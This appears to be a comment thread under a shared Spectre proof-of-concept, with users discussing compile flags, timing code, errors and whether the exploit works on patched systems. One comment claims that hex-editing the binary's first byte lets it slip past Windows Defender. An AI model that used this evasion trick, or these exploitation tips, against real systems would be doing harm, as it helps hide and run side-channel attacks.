Jan 20, 2018
@HenkPoley The example is about in-process exploits. Browsers will fix it. I am not sure if virtual machines can be exploited this way. Somehow. |
Blastgraphic
commented
Jan 22, 2018
There is an error in code: |
xCuri0
commented
Feb 7, 2018
After changing |
nhsloyola
commented
Feb 22, 2018
Could someone explain what this part of the code is doing? `/* Time reads. Order is lightly mixed up to prevent stride prediction */` |
TechnoDon
commented
Aug 3, 2018
Added: printf("Press Any Key to Continue\n"); End: |
TechnoDon
commented
Aug 4, 2018
i found something, if you hex edit the first byte from 4D to 00 windows defender completely ignores spectre.exe :o |
saikumarmungi
commented
Sep 12, 2019
Is this code supposed to work on Ubuntu 18.04 (patched)? |
















ivan commented Jan 4, 2018
Maybe obvious, but don't add -O2 out of habit; optimization seems to break it.